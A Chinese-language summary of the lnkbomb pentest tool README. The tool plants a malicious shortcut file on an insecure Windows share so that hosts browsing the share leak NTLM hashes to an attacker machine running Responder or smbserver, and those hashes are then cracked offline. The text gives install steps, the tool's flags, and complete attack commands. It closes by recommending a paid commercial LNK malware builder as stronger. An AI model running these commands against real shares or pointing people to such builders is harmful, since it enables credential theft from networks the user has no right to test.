dievus/lnkbomb
Lnkbomb 用于将恶意快捷方式文件上传到不安全的文件共享。该漏洞是由于 Windows 寻找与快捷方式文件关联的图标文件而存在的。该图标文件可以定向到运行 Responder 或 smbserver 的渗透测试人员的机器上,以收集 NTLMv1 或 NTLMv2 哈希(取决于受害主机的配置)。然后,测试人员可以尝试使用 Hashcat 之类的工具离线破解这些收集的哈希值。
负载文件直接上传到测试人员在命令行中指定的不安全文件中。测试仪还包括他们的 IP 地址,该地址被写入有效负载。
Python 用法
安装 Lnkbomb
请注意,该项目在 Windows 中始终如一地工作。它在 Linux 中可能存在问题。
git clone https://github.com/dievus/lnkbomb.git
将目录更改为 lnkbomb 并运行:
python3 lnkbomb.py -h
这将输出帮助菜单,其中包含以下标志:
-h, --help - Lists the help options
-t, --target - Specifies the target file share (ex. -t \\192.168.1.1\Share)
-a, --attacker - Specifies the tester's attack machine (ex. -a 192.168.1.2)
-r, --recover - Used to remove the payload when testing is completed (ex. -r randomfilegenerated.recover)
完整命令的示例包括:
python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2
python3 lnkbomb.py -r randomfilegenerated.recover
您将需要使用像 Responder 或 smbserver 这样的工具来捕获 NTLM 哈希:
responder -I eth0 -dwf -v
或者:
smbserver.py . . -smb2support
可执行用法
从页面右侧的发布链接下载 Lnkbomb。除了使用 lnkbomb.exe 而不是 python3 lnkbomb.py 之外,所有标志都与 Python 版本相同。
笔记
请记住,此工具仅用于道德黑客和渗透测试目的。我不容忍任何包括您当前无权测试的测试目标的行为。
付费变强
我觉得还是付费的“Quantum Builder”更强一些:
22.06.22-Cyble - Quantum Software:基于 LNK 文件的构建器